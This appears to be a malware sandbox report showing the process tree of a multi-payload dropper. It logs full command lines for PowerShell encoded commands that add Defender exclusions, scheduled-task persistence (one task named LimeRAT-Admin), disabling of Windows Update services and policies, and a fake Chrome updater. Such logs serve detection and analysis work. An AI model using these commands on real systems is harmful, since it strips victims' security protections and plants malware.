C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAdABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZgB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdABrACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
PID:540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"' & exit3⤵PID:407884
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"'4⤵
- Creates scheduled task(s)
PID:407972
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp10B4.tmp.bat""3⤵PID:407912
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:407992
-
-
C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"4⤵
- Executes dropped EXE
PID:408144
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2148 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:116408
-
-
-
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"2⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:100 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3.exe >> NUL3⤵PID:399996
-
-
C:\ProgramData\GeForce\Lib\COM Surrogate.exe"C:\ProgramData\GeForce\Lib\COM Surrogate.exe"3⤵
- Enumerates VirtualBox registry keys
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:399940
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
PID:4168 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\WindosCert.exe'"3⤵
- Creates scheduled task(s)
PID:408028
-
-
C:\Users\Admin\AppData\Roaming\WindosCert.exe"C:\Users\Admin\AppData\Roaming\WindosCert.exe"3⤵
- Executes dropped EXE
PID:408088
-
-
-
C:\Users\Admin\AppData\Local\Temp\9.exe"C:\Users\Admin\AppData\Local\Temp\9.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:7864 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:437032
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5928 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:399728
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:22480
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:404868
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:405092
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:405180
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:405276
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:405364
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:405440
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:405476
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:405520
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
PID:405552
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:405584
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:405628
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:405704
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:405828
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:406072
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:406104
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:406144
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:406188
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:406220
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:406280
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:406360
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:406444
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:406508
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:406592
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:406572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:404924
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:405136
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:405212
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:405320
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
PID:405388
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAEUAQQBZAGcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGQAZwBCAHMAQQBHAFEAQQBjAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcQBvAHMAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBpAGkAbwBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAcQB1ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANgAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdAB6AGIAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHMAZgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"3⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:405724
-
-
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:14084 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:199320
-
-
-
C:\Users\Admin\AppData\Local\Temp\v0.7.exe"C:\Users\Admin\AppData\Local\Temp\v0.7.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:18688 -
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:107740 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:187028 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:213364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:135120 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:198272 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:244212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"3⤵
- Executes dropped EXE
PID:161724 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 161724 -s 9724⤵
- Program crash
PID:200044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8.exe"C:\Users\Admin\AppData\Local\Temp\8.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:14152 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵PID:287380
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"2⤵
- Executes dropped EXE
PID:14184
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 161724 -ip 1617241⤵PID:190496
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdgBsAGQAcQAjAD4A"1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:406252 -
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:406676 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:406744
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵PID:406952
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
PID:407084
-
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:407104
-
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
PID:407136
-
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
PID:407160
-
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
PID:407176
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
PID:407216
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
PID:407260
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
PID:407308
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
PID:407384
-
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
PID:407396
-
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:407412
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:407428
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
PID:407448
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:407480
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
PID:407464
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵PID:407508
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵PID:407524
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
PID:407496
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵PID:407540
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵PID:407576
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵PID:407560
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵PID:407592
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵PID:407608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵PID:407000
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵PID:407060
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵PID:407120
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵PID:407148
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵PID:407188
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe "czellrako"3⤵PID:407196
-
-
